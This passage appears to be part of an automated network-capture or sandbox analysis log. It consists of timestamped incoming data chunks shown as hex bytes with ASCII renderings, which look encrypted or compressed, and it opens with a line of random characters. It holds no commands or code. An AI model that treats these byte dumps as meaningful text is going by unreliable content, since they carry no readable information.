dtij;ZbA&\`a5fe&N#7*N+v&$,D?}T(VwB4~}wKI~;gi5`6Qcr+59jZ$"y:er5^I`\0_2l;T4Hl3lhu._o0hl&CHGAQIF3+,X
2023-10-13 13:21:13 UTC	1848	IN	Data Raw: f5 f4 f4 11 d6 61 51 d4 fc 54 dc f9 6d 1b 9d 17 bb a2 75 fc 17 18 08 24 33 a1 3f 2d 06 bb b5 41 93 9d 6b e0 e5 3f 95 c0 2d 2b 5b 2c 6b 59 8c aa 57 e9 68 59 a7 84 56 4e e9 d3 e6 e2 21 5d c7 bf 78 2b c6 3c 19 e7 2b e9 4a 0d a2 c9 ba 44 95 f6 dc 7d 6a 30 24 42 e7 ba 64 36 0b a8 d2 1e ed 46 5a b0 bf 62 0e ae 29 ad 63 2c 10 66 59 fb 56 01 df 7d 83 06 50 48 2d 62 67 fd 19 42 ca 13 5b d6 17 ec 02 a4 20 3e 4a df e3 28 a7 f2 15 96 da 2a 22 88 19 43 d7 b8 7e 42 0a 6c 73 c1 b4 49 5c b0 01 29 5f df 02 51 8c c3 f5 25 69 6c d4 18 08 f4 84 22 57 4c 2b 3f 46 a6 a7 4f fe 9a f2 b3 16 ff 02 0d c8 d6 d6 95 14 cd 7a be f4 7e d3 fd 6d c1 b6 cd 1c 8c 7c f0 bf 8a 4b 4e ff db 39 30 ff 0d 9b 1f 63 9b 83 3a 20 ce 37 ca 7f 73 f1 08 26 37 d1 5a 09 32 7c 2e 4f c0 99 30 54 0d 2f 2d 8b Data Ascii: aQTmu$3?-Ak?-+[,kYWhYVN!]x+<+JD}j0$Bd6FZb)c,fYV}PH-bgB[ >J(*"C~BlsI\)_Q%il"WL+?FOz~m\|KN90c: 7s&7Z2\|.O0T/-
2023-10-13 13:21:13 UTC	1864	IN	Data Raw: 4e 9c a5 ec 37 1a 9a f2 7a 2d 3d 98 a9 17 11 87 45 6a 28 f1 b1 c4 ef 9c d0 b5 7f 9e 80 77 1f c0 84 00 a7 7c bf 68 73 ae 38 1f fe 27 86 a6 98 ad 5b bf de 09 63 ec 6c 48 4f a5 1e 4e 5f ff 93 1c 52 07 23 e9 0e 7f 33 fd 83 ca d6 b4 4a f3 03 c5 a1 40 85 22 bb a1 f4 87 fa 5d 0f f1 47 64 70 0b 72 d8 cd 1e 98 89 be b9 96 33 a3 cc f8 58 68 5e a6 ab 82 7c 2b 01 b6 41 43 ef 2a 23 48 36 bb b2 f9 be 43 b8 10 b1 86 48 f1 c2 15 72 dd bc a4 f2 0b 09 12 d2 22 c6 2d 55 74 80 ce 74 04 69 40 6a 9b dc bd 95 cb 56 79 45 67 74 77 c7 a0 1e 3f 10 39 8a 01 e6 c9 1e 09 b9 bc 5f f7 30 3a 2d 5c 2b 71 8c 86 6c 6b 60 bd d5 bf 54 cb 70 6a 68 21 21 91 36 18 9a 19 89 bd 52 07 bf 09 76 13 07 8b 7d 26 f8 d8 22 5d 9c 8f 92 aa e6 29 42 40 cc e7 f7 30 e4 a4 32 47 2f c4 50 0e d6 7b 78 22 e7 ac Data Ascii: N7z-=Ej(w\|hs8'[clHON_R#3J@"]Gdpr3Xh^\|+AC*#H6CHr"-Utti@jVyEgtw?9_0:-\+qlk`Tpjh!!6Rv}&"])B@02G/P{x"
2023-10-13 13:21:13 UTC	1880	IN	Data Raw: 21 b9 a3 15 2b 34 a2 ef a6 60 eb 60 f0 40 80 fe 46 f2 99 d7 25 81 41 34 ce 5e 30 92 b3 c0 c3 47 43 1b 36 c0 60 43 76 34 23 10 e7 cf fe c6 08 e2 ed 77 ed 03 0d d5 d6 e2 31 bf 1a 40 08 72 9b 4f 04 c0 04 36 cf f5 89 2c aa 54 1f 42 72 5b 41 4c 25 b6 ce fc 73 4c 49 44 bf ab fc d1 6e c4 6f a9 44 18 9b 73 68 ab e5 bc 61 c9 0c be 8a 60 e0 f9 a4 f5 fc 98 86 a4 f3 7f 6a 4a 4a 7d 98 12 9b 88 f3 e4 fc 54 1c 95 49 d1 28 13 34 0f fb 64 78 32 c0 9f 22 ea a9 f5 a4 8b 08 02 fc d7 af 7f 54 91 66 9f 28 f5 75 85 78 c6 eb 35 d9 f7 fa a8 fa b5 ee e3 c7 73 b7 e0 5e be 45 d9 89 2d f2 db 33 71 3d de 7a 66 a4 d9 ac 17 ec 3c 30 3d ff f9 48 ce cb 88 c6 a3 a3 40 a0 c7 ca 16 7a c8 59 fb 01 c4 b9 af 3f 5d e3 4e fd d4 a4 c4 f8 52 f3 29 a3 8b 97 9a 1b 9c 0e fb b9 d1 4c e5 4a 42 3d 3a e4 Data Ascii: !+4``@F%A4^0GC6`Cv4#w1@rO6,TBr[AL%sLIDnoDsha`jJJ}TI(4dx2"Tf(ux5s^E-3q=zf<0=H@zY?]NR)LJB=:
2023-10-13 13:21:13 UTC	1896	IN	Data Raw: 02 09 6d 83 40 97 66 c7 fe 65 1d bc 53 8e 6e e4 ef 78 64 f3 7f 04 0f 7d 6e c7 09 a2 0e 40 00 22 2e fb dc 48 c9 b7 8e b2 09 4a 8a a2 f3 80 3f 54 4b 52 ce 97 6a 15 c7 9f 74 a3 75 18 86 aa 40 ad 31 26 3f df 4a dc f0 5a cc 09 0b 95 86 83 85 33 8b 8e f9 e6 02 ce 7e 29 8e 87 be 0d f1 85 cf 1e a5 14 82 51 7e 04 7d 5a 12 5b 86 53 73 a9 f8 74 5e 84 b4 f4 bd c3 03 c9 5c 92 6d 77 bb 14 9d 62 b7 c6 1e 40 a2 88 7a c3 74 93 37 1a f0 79 68 0c 6c d4 b3 30 40 d5 ce dc 45 0c f0 63 34 03 81 d2 62 3c 03 b1 3c b0 3f 7c f4 97 a3 01 a2 eb e7 6b a9 c5 6a 39 3d 74 6b d5 f0 4d 59 45 71 96 d9 27 20 58 2b b7 cd a0 7e 79 49 fc 6d 55 95 a2 77 e6 51 69 e9 11 5e f7 e1 60 65 c9 bf 4e 6b 37 ad 1d e0 8d 54 e7 a6 73 13 85 d4 b2 11 70 98 d5 96 41 43 01 e6 1f 6e 7d 8a e0 0b ee 93 92 0f e9 15 Data Ascii: m@feSnxd}n@".HJ?TKRjtu@1&?JZ3~)Q~}Z[Sst^\mwb@zt7yhl0@Ec4b<<?\|kj9=tkMYEq' X+~yImUwQi^`eNk7TspACn}
2023-10-13 13:21:13 UTC	1912	IN	Data Raw: f6 66 cf 45 35 30 d5 04 02 10 7c a1 c9 0e a9 86 5e 5d 9a f2 f9 6d 80 42 9b 50 61 6e 03 9f 54 89 0a e8 9c 72 b1 a7 a4 d6 86 81 16 ea f6 45 88 ab 27 ab b0 78 68 84 5e 8e 33 d5 8e a2 5b 6d 74 82 10 02 87 0a 0c d0 05 86 d0 42 ac ee 63 36 bc d9 03 48 b3 46 5d 8a 34 02 53 73 62 4d 98 2c 14 af c6 f4 97 ed 52 06 9b 7d 98 bf a7 6c a9 fa 99 05 bc b6 d3 ab a6 c8 18 8b 55 fa c4 3d 88 15 9a 47 10 0a 69 c2 ba 9c 28 05 49 1c f3 0c f5 55 d9 e1 42 ab 1b 16 4b af b0 da 67 88 5a 4a 4e 94 b0 0e e7 46 4b a4 a6 09 fc 29 ec 47 d0 c0 17 e1 ac 4a 89 2c 1c 4d c0 cf 4b 68 f0 01 9b f0 84 77 62 4e 34 f6 6c 29 e5 24 d0 c1 6e 9a a8 a4 da c8 4f dc cc 2e fa 93 1a 27 d7 9d 82 33 19 3d ef ac ee c2 8b c4 aa 7d 7d eb a2 99 a7 59 10 04 c2 ef 81 d1 f1 ff 07 64 b9 f6 84 86 07 e2 29 68 28 f5 a2 Data Ascii: fE50\|^]mBPanTrE'xh^3[mtBc6HF]4SsbM,R}lU=Gi(IUBKgZJNFK)GJ,MKhwbN4l)$nO.'3=}}Yd)h(
2023-10-13 13:21:13 UTC	1928	IN	Data Raw: 4f 96 e6 88 a5 29 12 47 99 ff 4a 7e 47 3f 72 b0 f0 47 83 4b 61 be 0a 02 dd 25 6d 3c 1f 33 80 f7 a0 78 17 02 f2 69 86 2c 4b 4f 7e 8a eb bc 20 82 75 37 1e 2c 54 87 7c 30 00 b7 76 e5 93 e1 f3 76 6f aa bd 68 f4 90 f4 32 9b b3 3b 92 c8 a7 14 29 50 48 b9 e8 b9 dd 3b b8 13 27 0a a0 1b c4 8b be 19 42 05 16 ad 81 e7 99 1d 4e fa 33 84 b1 c7 80 ca 49 02 97 53 eb 08 83 a1 dd ed 5c 6b 1e 62 dd ff 40 5d 95 fd 7d 37 4a ee ab 42 27 50 22 01 73 7b f3 76 d3 af 12 da 59 74 26 05 9b c7 98 bf 22 4f b7 2e 5d 2c c1 d3 73 cf fe 16 05 1f df 54 03 14 b4 1d c0 a4 fc c4 81 c3 ac 55 c4 a9 0c bd 8b ac 5e 92 be 01 3d 2d fe b6 3f f2 41 a6 64 2e 6a d1 fe 09 28 44 50 ed 4b 5a 42 49 9c 44 bc 5c 1f 2e 93 cd aa 01 6a 32 f5 d2 86 49 f9 68 a5 fc 84 d5 68 64 60 b5 a9 d0 e4 94 d1 e3 1c 15 87 f9 Data Ascii: O)GJ~G?rGKa%m<3xi,KO~ u7,T\|0vvoh2;)PH;'BN3IS\kb@]}7JB'P"s{vYt&"O.],sTU^=-?Ad.j(DPKZBID\.j2Ihhd`
2023-10-13 13:21:13 UTC	1944	IN	Data Raw: dc b6 fc 4a 30 cd fe fe d8 82 39 98 82 a9 2f 09 32 d5 9b 75 0f 0c e1 14 2e c0 c9 eb 7a 7d 0c 8a d8 b1 65 62 8f c2 60 f1 03 71 58 a8 b3 13 fc ff 6b 4a f7 3f 4c 9d bc 39 eb 66 0e bd c3 e2 49 84 e7 c2 47 b4 ff 84 1c a3 d4 cb 1e 35 c0 21 03 27 38 05 09 9a 16 fe ca 41 0e c4 cb 09 db 4f 7f d2 6c 31 29 c3 43 23 49 fa ab 35 83 c2 86 dc 3e 23 9b df 92 bb b5 7e 1e f2 81 de 02 ef f5 ca 7e 9f e8 f8 4b 17 23 06 bf 0c d6 2c a2 2a 91 f7 b0 aa 42 92 4d 7f d2 2b 5d 54 35 e9 3b 3e b9 74 2b cf 13 ea ff a3 3f ed 8a 59 01 f8 2d 34 23 fd 87 79 0c d5 85 00 11 2c 22 f1 47 70 8a d1 45 13 50 b0 9f 77 b5 b7 74 0a 63 66 25 37 48 3c 5f b1 65 2a f3 0a 79 03 47 82 da 90 b0 9a 73 d3 01 70 0d 25 0d 44 6c bb a0 10 52 ce d6 c7 c3 c4 34 14 69 74 38 7f ef 96 4e 1d cb 54 29 dd 63 47 ae 3a 50 Data Ascii: J09/2u.z}eb`qXkJ?L9fIG5!'8AOl1)C#I5>#~~K#,BM+]T5;>t+?Y-4#y,"GpEPwtcf%7H<_eyGsp%DlR4it8NT)cG:P
2023-10-13 13:21:13 UTC	1960	IN	Data Raw: 68 1e 3d 84 14 d9 20 04 61 b5 57 f5 fe c3 ae 8e 04 46 b9 36 01 b9 f3 09 b9 a9 e2 52 ce 89 83 fd a1 ea d1 15 8d 65 04 14 b1 60 df f8 fe 08 19 be 1f 41 9f 73 28 c0 cb b1 84 5f 24 b9 4c ee 53 8a c2 b0 50 a8 77 3b 72 21 ae 5f f9 fa 9f c9 50 54 04 0e c1 2b de c6 c0 7b 16 46 7a d7 d4 40 ab 22 55 e0 b6 6b c5 28 c3 1d 28 ff 89 74 96 36 4b 73 fd 39 f8 86 96 ef 90 d2 5d e7 de 69 af 5e 78 55 5a e4 26 42 12 f2 a9 a9 65 b8 a5 00 10 c3 15 2a 61 fa 5d 07 13 3a 20 b7 98 a8 90 b5 88 ac bd c0 2f 78 04 8b 26 03 c1 48 68 46 c9 40 df 01 29 7d 6b 82 69 46 24 0b 3a 03 cf 67 ca 29 93 8d f1 fb cb 3a 91 30 21 d2 87 4d 97 28 71 d9 52 e7 6f dc 03 a7 1c bd 9a 6e 71 f2 90 0c 63 7c 9d 4e 27 6e 23 4b e8 b2 90 53 fe 07 3f 45 e6 d5 6a 6a d8 94 5c 7f 25 04 f3 8d e7 58 23 ea 08 02 4a 4c dd Data Ascii: h= aWF6Re`As(_$LSPw;r!_PT+{Fz@"Uk((t6Ks9]i^xUZ&Be*a]: /x&HhF@)}kiF$:g):0!M(qRonqc\|N'n#KS?Ejj\%X#JL
2023-10-13 13:21:13 UTC	1976	IN	Data Raw: 88 59 da eb 06 89 8a 27 d5 e5 ba 35 f3 ef c3 3c b7 4a 0d 04 b6 3c 7f 08 15 d8 55 f9 e7 08 cd fe e5 2e db 5e e2 c7 6d db e9 24 21 2a 45 7a d5 5b e0 a4 2a 4d 9f 33 e8 a4 78 69 96 e1 26 77 0b 11 e6 2c 61 33 f4 e1 df 75 a0 77 94 83 a9 0c c7 ab d3 70 48 f2 b9 a9 86 16 3b b1 19 64 d1 22 15 5a 2e 33 0e 5e 36 ec 14 df 71 a2 72 d7 d0 f2 c7 42 76 f3 47 98 ee 09 43 49 07 a9 1e a3 1d 34 b5 64 e1 05 a0 14 01 ab 13 ac 1e 28 fb 84 99 3b d7 42 15 65 de 9a 84 fe fb a3 1d b3 1b 36 8c 84 0d e7 52 bc f6 99 e2 51 f5 16 33 99 30 d3 4d a1 2d c2 8f 55 29 89 f7 19 77 73 0a f9 94 fa 12 75 32 68 33 09 f6 9d 7d 8b 80 0d 49 56 7c f1 13 06 90 d2 98 39 73 da 2c 86 cb b1 71 6e 57 95 38 33 a8 83 56 29 fd 1b 69 23 23 e3 05 5b 33 15 bb aa f3 26 fd db d0 04 51 75 65 4b 61 86 d2 74 e4 db a5 Data Ascii: Y'5<J<U.^m$!Ez[M3xi&w,a3uwpH;d"Z.3^6qrBvGCI4d(;Be6RQ30M-U)wsu2h3}IV\|9s,qnW83V)i##[3&QueKat
2023-10-13 13:21:13 UTC	1992	IN	Data Raw: 5a 94 81 93 d6 6b a4 24 e2 9f 8f 5b db 3c 94 a8 46 95 1a 79 d3 cb ed 7e 2a b5 53 2e 2f 83 5b c2 91 64 c5 45 bb b4 6a ec 44 86 10 bd 19 53 0a db 0e ef 8e e3 f7 72 9e d1 48 40 c3 20 e8 4b 21 50 a7 88 35 1d 88 54 e7 50 93 b5 1d 40 77 f7 36 37 84 a3 dc 07 cd 01 df 5f 0b e2 fd d7 c3 ad f8 47 96 ec 32 99 8b d4 a7 69 ef 75 00 5e d2 de 07 cc 62 04 04 74 a7 23 73 ac 8a 88 c2 bc bf 8a 91 92 93 48 27 5a b0 26 b7 14 23 94 c7 79 a4 b5 07 d0 90 f8 96 bd 34 3e 91 5c 85 d5 bf 87 8f ab 9b 41 41 b4 93 4e f6 3b 9a 10 f9 8a 95 dd 4a 25 5a 3b 75 b2 e9 ed c0 95 8b 18 f5 1b 1f 7b 9d 5b 26 3d fb 49 54 58 56 02 e0 3a 68 cf 8b 99 de cd 72 6d fd ae f9 bc c6 cc 2b bb ca ae d1 68 36 02 0a 9a fd 13 7d d9 6c 68 46 78 ae 7b 42 f9 6a 04 84 df 22 aa b8 56 62 64 91 3d 84 e2 a7 a7 0e bd be Data Ascii: Zk$[<Fy~*S./[dEjDSrH@ K!P5TP@w67_G2iu^bt#sH'Z&#y4>\AAN;J%Z;u{[&=ITXV:hrm+h6}lhFx{Bj"Vbd=
2023-10-13 13:21:13 UTC	2008	IN	Data Raw: 80 20 ba 39 bf 1a 07 08 ef 99 cd 9d a8 1e 4e 31 20 a9 04 16 43 f9 03 cd 74 d5 ce 87 34 33 98 af 1d 27 fc 2e 1d 8e ee 31 1a a7 3e ed 23 5d 62 5a 67 4e d3 a3 10 6e a7 85 4b 2d 1d 14 76 c2 f1 0a a1 d6 18 5a 94 80 8f e2 4a 7a bc 27 17 52 c1 48 0d 5a 9c 55 64 95 e5 b8 9d 2c ef 38 8f 02 28 36 89 52 2e 11 64 ca 96 5c a9 86 29 80 96 33 53 43 df 26 2b f0 c3 09 02 f2 a5 1b e6 45 07 c1 f7 68 26 ce a5 bb 65 cd 4a 4d 8a 7d 0f f2 b0 05 73 35 e5 bc 93 03 99 c1 2d 2d a0 43 96 2a 89 1d e9 f7 3b a0 fd 8d 1a 63 90 48 ff 4b d3 1d 0e fb d6 00 96 cd 20 5b 43 0e a3 6b 27 f1 74 7b 2e f9 19 38 22 24 7e 7f 71 a9 53 0c ab 21 e7 70 d5 c4 e7 0a 25 3a 1f 7f 65 14 e6 20 5c 4b b7 c8 50 8d d8 c9 dd 6e 83 b7 d7 dd 8b 7c ff 17 4b a6 93 23 cc 57 53 2c 01 14 11 94 31 df 32 89 48 d9 dd a3 fc Data Ascii: 9N1 Ct43'.1>#]bZgNnK-vZJz'RHZUd,8(6R.d\)3SC&+Eh&eJM}s5--C*;cHK [Ck't{.8"$~qS!p%:e \KPn\|K#WS,12H
2023-10-13 13:21:13 UTC	2040	IN	Data Raw: ab 05 6c 20 cf 38 fb b7 6a 06 d9 8b 0d 30 97 4c 0e f8 b5 53 08 0a d1 3e dd 54 a7 87 85 a1 12 91 2b 28 d4 c4 3e b4 6d 59 d0 56 8c 57 fe 6c fb 3f 22 a2 7f 98 9b 9c 82 f0 82 01 df 54 91 0f af 2a 2d c3 fe 6b 28 4a b6 07 ff 54 6a dc 8e 29 75 3b 46 ce b8 ec b9 49 6c 4b 5a fe 1e 8e d5 46 5a b1 e8 f0 c4 63 07 e7 59 d4 65 45 ec e9 b7 e5 00 4d 34 5f 23 f3 e9 4e a9 80 d5 ae 73 92 40 66 ae 89 26 3c f2 4a 9f d3 db 7b d3 1c 5e d9 5d 91 be 54 6b d7 78 97 79 6e f2 82 66 85 36 d2 aa 1b 50 48 1e f5 a7 75 17 df ad 3e aa ad 92 80 07 7d 7d be a4 41 0a 9a 3d 02 56 18 2b a8 0a a6 06 6e 23 59 11 c1 bb 84 69 7f e3 c3 d7 d3 4a ca 36 f7 56 56 f6 54 e9 47 76 a6 89 36 af 08 53 04 9c 9d 18 10 39 1c fa 8b 28 f8 c9 6c c3 58 f5 86 4f fe e2 12 89 17 ad ba 2b 51 b1 65 68 4d 71 0e e3 29 3f Data Ascii: l 8j0LS>T+(>mYVWl?"T*-k(JTj)u;FIlKZFZcYeEM4_#Ns@f&<J{^]Tkxynf6PHu>}}A=V+n#YiJ6VVTGv6S9(lXO+QehMq)?
2023-10-13 13:21:13 UTC	2088	IN	Data Raw: fc 0a 03 de b1 6d 89 a7 b8 34 f3 83 8c af 8b 2b db 6e 80 ee 97 ea 06 d2 a0 37 f9 93 84 99 03 e7 86 ae 9d 7a 0f 34 3a d1 81 22 9d 55 3a 49 53 47 a4 83 0f 5e 71 03 06 09 42 cb 70 f5 0a b0 d9 2f 43 62 d2 01 56 a7 1f 83 06 06 ba 67 4b 79 34 76 90 59 c4 68 79 4d f6 19 fc 7f 7d 35 5b 63 3f 26 13 38 28 63 e8 81 fc 16 d6 c8 bc 00 3a 7f 32 c4 0e 3c 10 2c 4a 87 37 52 a0 91 28 2e dc 04 41 1f 20 17 79 9e d0 4b f9 ee 2b d8 ea bc 53 d8 fb 23 36 e2 a7 a5 1f de 16 5b f5 d4 ce 7d df fb 68 53 aa 90 7d cd bd 1d 84 28 62 76 57 4a 8b f0 aa 2a b4 05 37 54 3f dc 65 be a8 b7 59 83 0e cd 13 59 e4 4d 2b f9 35 8f b0 0e 23 69 aa 8a 9f 5d 24 23 fc e6 2d d5 95 10 46 1b cf 70 2c 29 c1 f4 8a a3 a8 cf dc 4f e7 51 3f 71 a4 42 61 de e9 c8 27 de ab c0 26 34 ac d9 0d 80 f4 d5 eb a1 62 ad d4 Data Ascii: m4+n7z4:"U:ISG^qBp/CbVgKy4vYhyM}5[c?&8(c:2<,J7R(.A yK+S#6[}hS}(bvWJ*7T?eYYM+5#i]$#-Fp,)OQ?qBa'&4b
2023-10-13 13:21:13 UTC	2200	IN	Data Raw: 40 ad 11 61 9a 57 0f 36 35 fc 1f 6c 45 a0 a2 5e 5b bb a8 57 07 38 fd 70 b8 a9 5b 8d 8a 23 e4 51 c3 47 ca 48 e3 8c 75 fb 6a 98 ce 35 78 0a 89 74 4a fb 47 fc d9 5d 5d b2 32 81 1f a1 d6 28 67 53 96 e5 2b 11 e3 38 85 ee 67 af 88 53 3c ef ee 54 5b 40 bd a5 b8 3f 38 cb 8f 03 4e ad fc 98 19 4e 51 b6 ea d5 bf 7c 08 78 f9 94 30 1c 18 cc 08 1b 04 8e 9b 72 1b 04 23 0a 43 83 bb a3 21 66 f4 b4 2c 11 31 98 6e b5 3f cb 5d 3e 17 ee e6 fc 45 ec 7c fa 90 50 f9 c7 ec 39 b5 d9 8c 95 d8 78 ef b1 9b b4 56 ed 05 17 80 7d 47 bb 00 0d 2a 24 71 5d 4e 93 7e ca e4 2d a7 4a 92 65 6b 89 73 a1 f0 4c 6d 2f 55 1b 22 cd da 63 ab d2 e5 a8 34 f2 b6 2a 75 74 ac b8 4e 29 5b 1c 53 e7 11 3f 99 11 f7 df 56 f5 75 41 f1 12 da b7 b3 e9 e8 e2 f3 84 37 b4 3b 86 ee 4c cd 5f e5 b0 f1 a3 dd b0 47 2a 1a Data Ascii: @aW65lE^[W8p[#QGHuj5xtJG]]2(gS+8gS<T[@?8NNQ\|x0r#C!f,1n?]>E\|P9xV}G$q]N~-JeksLm/U"c4utN)[S?VuA7;L_G*
2023-10-13 13:21:13 UTC	2216	IN	Data Raw: 61 f2 03 20 0d 0d 68 28 04 af 5b d3 66 cd 38 17 2a 08 9c 58 29 8b b7 67 72 2e 7f e6 0b f7 6c 92 09 66 69 15 c3 ed e5 52 7a 09 d7 31 6c de c3 2c f9 f2 19 80 7e b1 53 a9 e9 35 4e fa f6 64 25 48 45 3d eb b8 67 1c aa 8a 4e e7 8e a4 78 25 aa a5 fb 7c 65 f4 46 1d 7e e4 89 75 c3 ec 5e d5 cd 8e d7 61 d8 d8 81 40 0d 3a 56 b1 31 c8 dc 87 c1 c0 8c 0d f0 7f a5 ab 15 77 3f 25 c0 dc 80 f3 a2 fc e3 b0 c3 9e ca 2a 87 61 af 8f a0 76 49 01 00 aa 61 8e 7c 5f e7 7f 1b 8f 93 95 b9 fc 3f b3 9e 78 fc 75 e9 d6 b2 cc f9 27 11 48 dd d5 a7 29 66 3b fe ce 01 16 ce d6 10 3d 94 f8 18 dd 1f 65 87 2c 7d 6e 72 d4 21 20 cb fc cb 98 e8 ad be 3d 21 1a 70 6c 7b 4f ae 5d 48 69 fd 1c 78 af 40 17 f5 e2 9f 59 7b ef 1f 45 78 59 cb 85 79 d4 5b fe 45 81 7e a8 35 33 eb 1d f1 09 be a4 11 7d 1c e7 13 Data Ascii: a h([f8X)gr.lfiRz1l,~S5Nd%HE=gNx%\|eF~u^a@:V1w?%avIa\|_?xu'H)f;=e,}nr! =!pl{O]Hix@Y{ExYy[E~53}
2023-10-13 13:21:13 UTC	2232	IN	Data Raw: ed 1f 2e cd 33 52 fb 56 c5 15 e5 bd 1f 98 0e cd 26 69 f0 2e 9f e1 e8 33 fc a9 a6 ef db 49 5d e5 ff db 5d cf c0 3b b1 55 79 a7 30 43 1d f3 46 d5 7f c6 22 fd 53 df 8d 30 ad 66 5c 92 c3 8b 9c 43 d5 28 f7 28 38 55 80 0a 6f b2 32 35 83 67 54 29 1a 6b ff 1f 06 37 31 2b 30 96 81 45 f1 00 e2 29 cf 01 d4 d2 cc 8e 2a c6 c2 f7 1c e5 00 b1 84 ac 73 28 fc a0 68 5a c2 11 36 07 dc ff 60 07 8e a0 95 25 64 c3 c1 2f d1 eb 77 4c cc 60 12 40 47 e7 27 6d f4 27 34 c3 46 35 1b 1c 0c c6 8a 7a eb 6a b2 7f dd 60 58 1e b8 c1 f4 a9 2c 0c e4 1b 0e 9b 77 03 e3 1a a2 45 aa 56 36 65 59 48 4e 42 45 87 2c 02 ed 40 41 70 2a da 5f bc 21 ac 36 9b f4 dc 37 4b 11 38 ed 63 09 31 15 be b8 ce 41 2d 44 eb ae 2c 46 e3 51 b3 79 3e a8 13 c4 a3 46 7d 9e 34 e4 7e 6e 0a 8c 51 be 02 80 ef b1 a3 d6 fc d9 Data Ascii: .3RV&i.3I]];Uy0CF"S0f\C((8Uo25gT)k71+0E)s(hZ6`%d/wL`@G'm'4F5zj`X,wEV6eYHNBE,@Ap_!67K8c1A-D,FQy>F}4~nQ
2023-10-13 13:21:13 UTC	2248	IN	Data Raw: 8e fd 11 3e 93 3d 7f eb 39 f3 0d d8 a4 94 49 73 9d 95 49 a9 d1 5b 6f 1d 3d 87 29 97 b7 e0 86 cc 4e c5 cd 46 a7 07 15 4f 88 d6 ed bd 45 d9 76 3c 84 69 c7 dc 17 ed 58 1c 80 41 fc d9 d5 af bf 6e e9 df c0 d7 61 cc 5f d5 38 a4 30 03 88 56 f1 d2 e9 2f 4a 54 b0 c3 54 34 17 45 32 0f b8 0a 29 52 a7 ad d8 eb d7 f4 4f b9 f2 14 f1 82 67 ec 42 0e 71 29 f7 1c c0 7e 8b d1 91 3c 8f 74 c3 d5 47 42 cd 93 0f 4b bf ea 6e c0 4a a7 32 93 62 30 7a e0 e5 2d 9c f8 cf 7c 85 ef 34 73 22 0b 91 66 6d 3a 96 ec 8f 43 73 78 f8 3a a1 a8 bd 76 f2 69 4b 48 c2 85 b1 85 46 e4 51 f8 33 18 34 1e 44 96 57 c1 8b ce 52 c8 c6 a9 ad 35 aa 2a 46 81 5c b8 02 58 b4 0c 7b 10 4d ec cb a3 a7 32 83 18 93 d4 06 b2 e6 8b 44 4c 62 c8 e5 f1 8e a1 06 ab 71 fa f4 60 60 3a a4 07 cd 3c 0e be cc f2 0e 6a b0 9d f1 Data Ascii: >=9IsI[o=)NFOEv<iXAna_80V/JTT4E2)ROgBq)~<tGBKnJ2b0z-\|4s"fm:Csx:viKHFQ34DWR5*F\X{M2DLbq``:<j
2023-10-13 13:21:13 UTC	2264	IN	Data Raw: 82 98 bf 9c e8 dd e1 73 ad 93 fb 91 7c 9c df 24 e3 39 42 86 fb 22 c6 a1 7a cd 37 93 f7 61 38 79 29 dc 7c ff f6 da 82 a1 44 99 59 52 07 93 ae 12 27 43 12 32 6c be 65 e3 85 a1 3f ab 18 82 c6 ab f1 bc 46 a8 58 14 65 94 31 34 03 1a 84 00 ff 9f e0 2a 14 69 84 9a e5 5b db 6f 4e 7f 69 03 26 bf b0 36 0e 44 22 08 22 d1 2b 2a 8a a9 8f 3d 75 2e 4a 64 d2 f5 e4 14 96 83 53 49 45 64 74 7c 27 8e 56 b8 3b c4 3e 08 c7 c7 e7 87 a5 3f 4d 4b 95 bd e5 81 e4 28 9a db b3 06 cf fd 95 00 5c b3 06 84 76 e7 ec a4 0c 81 d7 c1 d1 b1 be 6c 94 5a fc eb 99 b1 04 30 ea e6 bf 4e 88 dc 9d 77 89 f0 60 b9 80 68 d5 e1 fd 62 4b 62 e4 78 1e 77 57 10 89 e9 d7 82 42 5a 2f 84 c9 74 5f 0a 0d 98 33 ca 5f 60 52 00 32 0c d8 ad 21 a0 ac 7a 53 3c 5a 8f fe 15 af 53 16 89 62 c1 93 b3 6b 91 75 f0 55 16 06 Data Ascii: s\|$9B"z7a8y)\|DYR'C2le?FXe14i[oNi&6D""+=u.JdSIEdt\|'V;>?MK(\vlZ0Nw`hbKbxwWBZ/t_3_`R2!zS<ZSbkuU
2023-10-13 13:21:13 UTC	2280	IN	Data Raw: 12 a9 c3 c6 d5 6e 4d 99 26 df 3b db 50 0e a3 c9 f8 05 13 f0 7d 5d 9a 70 a8 33 6f 64 e5 86 1a 4f 64 0e 02 16 39 cd 8e 9c 38 79 be 4e 2a 08 31 8a 23 a5 33 8f 44 e0 69 69 e5 20 0a 86 ad d6 a1 b8 ec 2c 52 d4 3e cf 34 bf bd 0a 58 8a 9f 57 5f 0d 33 46 d7 64 fc 8d 81 a0 31 1f bf 41 d5 b4 a2 cc 87 a0 10 a5 3a 74 ae 66 a2 04 ee 82 b6 83 44 1f 67 5d 9b 87 3b 97 37 de e9 63 64 10 10 ff 44 2d ad 55 f6 c2 2e a9 f2 c5 10 9c cd 15 03 94 ad ec 0d 94 21 1c b8 0b 82 66 a5 9c b1 7c 1e fd c9 b5 26 8a a5 f6 29 5e 2c 6d 85 7e fc 86 9f 75 f4 51 1d 80 65 c8 ca 11 7e bd 21 5e b1 5c da de 3b 58 97 54 73 a8 a6 21 14 49 73 7c c8 4a 77 29 84 20 98 4d 19 2e 8e d8 db 3e 26 7c 95 87 f9 8b dd 42 0f 15 3c ab 0b 33 88 75 10 29 c4 fa 93 04 01 23 d4 e5 95 f8 42 83 38 db b6 3e 6a ef 94 c8 14 Data Ascii: nM&;P}]p3odOd98yN*1#3Dii ,R>4XW_3Fd1A:tfDg];7cdD-U.!f\|&)^,m~uQe~!^\;XTs!Is\|Jw) M.>&\|B<3u)#B8>j
2023-10-13 13:21:13 UTC	2296	IN	Data Raw: d9 9e 6c b1 ab 31 34 dc 23 6c ec f2 c6 47 8a 30 d8 df 1b ff 26 d1 22 b1 35 8b 78 c3 90 46 eb 9a 19 6a 12 e9 4e 66 76 a9 5f 5b 88 28 b1 32 fa e9 dd f6 27 76 bd b8 82 e6 74 87 c4 17 86 13 32 08 1b 40 b8 0c 55 23 82 d8 b7 aa 37 ff d1 8d 83 e9 04 7d 60 b9 f4 af ea c8 32 f5 f9 39 82 d6 ef ad 00 c1 d2 19 4b 31 a0 73 ef 88 90 07 85 80 10 c4 4c 12 6b ff b7 02 ba 52 80 d1 c1 6b 8a 06 ef 78 51 df 7f 0f cf cb 73 25 b1 07 93 0f 3a 64 41 37 0c 5f 6f 9e 13 bc 62 5c eb ce f9 f2 e2 f5 e5 1a 5f ad f0 f9 fa 4c e2 7a 33 04 1f da 1d 03 3d c7 89 95 e0 c4 fa 33 d7 c5 fc e7 8b a0 82 9b e6 da cb 56 81 fb ae 60 12 96 21 44 75 f6 65 